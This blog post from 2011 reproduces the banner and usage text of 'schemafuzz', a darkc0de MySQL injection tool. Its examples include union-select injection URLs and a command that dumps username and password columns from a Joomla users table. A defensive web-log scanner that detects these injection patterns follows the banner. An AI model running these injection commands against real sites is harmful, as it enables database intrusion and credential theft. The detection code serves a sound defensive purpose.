Sunday, 23 January 2011

Schemafuzz

#!/usr/bin/python
################################################################
# .___ __ _______ .___
# __| _/____ _______| | __ ____ \ _ \ __| _/____
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\
# \/ \/ \/
# ___________ ______ _ __
# _/ ___\_ __ \_/ __ \ \/ \/ /
# \ \___| | \/\ ___/\ /
# \___ >__| \___ >\/\_/
# est.2007 \/ \/ forum.darkc0de.com
################################################################
# MySQL Injection Schema, Dataext, and fuzzer

# Share the c0de!

# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx,
# and the darkc0de crew

# NOTES:
# Proxy function may be a little buggy if you're using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com; if data comes back it's good... no data = failed and the proxy
# will not be used. This is an effort to keep the script from getting stuck in an endless loop.
# Any other questions, hit the forums and ask. Google is your friend!

# This was written for educational purposes only. Use it at your own risk.
# Author will not be responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# BE WARNED, THIS TOOL IS VERY LOUD..

#Set default evasion options here

# Usage banner; print() with a single argument runs under both Python 2 and Python 3.
print(" Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com")
print("\tModes:")
print("\tDefine: --dbs Shows all databases user has access too. MySQL v5+")
print("\tDefine: --schema Enumerate Information_schema Database. MySQL v5+")
print("\tDefine: --full Enumerates all databases information_schema table MySQL v5+")
print("\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+")
print("\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+")
print("\tDefine: --findcol Finds Columns length of a SQLi MySQL v4+")
print("\tDefine: --info Gets MySQL server configuration only. MySQL v4+")
print("\n\tRequired:")
print("\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"")
print("\n\tMode dump and schema options:")
print("\tDefine: -D \"database_name\"")
print("\tDefine: -T \"table_name\"")
print("\tDefine: -C \"column_name,column_name...\"")
print("\n\tOptional:")
print("\tDefine: -p \"127.0.0.1:80 or proxy.txt\"")
print("\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt")
print("\tDefine: -r row number to start at")
print("\tDefine: -v Verbosity off option. Will not display row #'s in dump mode.")
print("\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"")
print(" Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"")
print(" Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200")
print(" Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password")
print(" Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt")
print(" Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\"")
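
The usage examples above put a `union+select` column list, the placeholder `darkc0de` and `information_schema` directly in the request URL, which is why the script's own note calls it loud. A web-log check for those three strings follows as an added example (not part of schemafuzz or the original post); the combined log format, the sample lines and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Indicators taken from the usage text above: a UNION SELECT column list,
# the information_schema database, and the "darkc0de" placeholder column.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\s+[\w'\"(]+\s*,", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "darkc0de_marker": re.compile(r"darkc0de", re.I),
}
# Client address and request target from a combined-format access log line (assumed format).
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample log using documentation IP ranges, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [23/Jan/2011:10:00:01 +0000] "GET /news.php?id=-1+union+select+1,darkc0de,3,4 HTTP/1.1" 200 512
203.0.113.9 - - [23/Jan/2011:10:00:02 +0000] "GET /news.php?id=-1%20UNION%20SELECT%201,2,3,4 HTTP/1.1" 200 498
203.0.113.9 - - [23/Jan/2011:10:00:03 +0000] "GET /news.php?id=-1+union+select+1,2,3,4+from+information_schema.tables HTTP/1.1" 200 530
192.0.2.10 - - [23/Jan/2011:10:00:04 +0000] "GET /news.php?id=22 HTTP/1.1" 200 2048
192.0.2.10 - - [23/Jan/2011:10:00:05 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 1024
"""

def indicators_for(target):
    """Indicator names present in the URL-decoded query string of a request target."""
    decoded = unquote_plus(target.partition("?")[2])
    return {name for name, rx in INDICATORS.items() if rx.search(decoded)}

def scan(log_text):
    """Map client IP -> {'hits': flagged request count, 'indicators': sorted names}."""
    report = defaultdict(lambda: {"hits": 0, "indicators": set()})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        found = indicators_for(m.group(2)) if m else set()
        if found:
            report[m.group(1)]["hits"] += 1
            report[m.group(1)]["indicators"] |= found
    return {ip: {"hits": r["hits"], "indicators": sorted(r["indicators"])}
            for ip, r in report.items()}

if __name__ == "__main__":
    for ip, r in scan(SAMPLE_LOG).items():
        print(ip, r["hits"], ",".join(r["indicators"]))
```

The `union_select` pattern requires a comma-separated column list after `select`, so the benign search for "student union select committee" in the sample is not flagged.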

Download here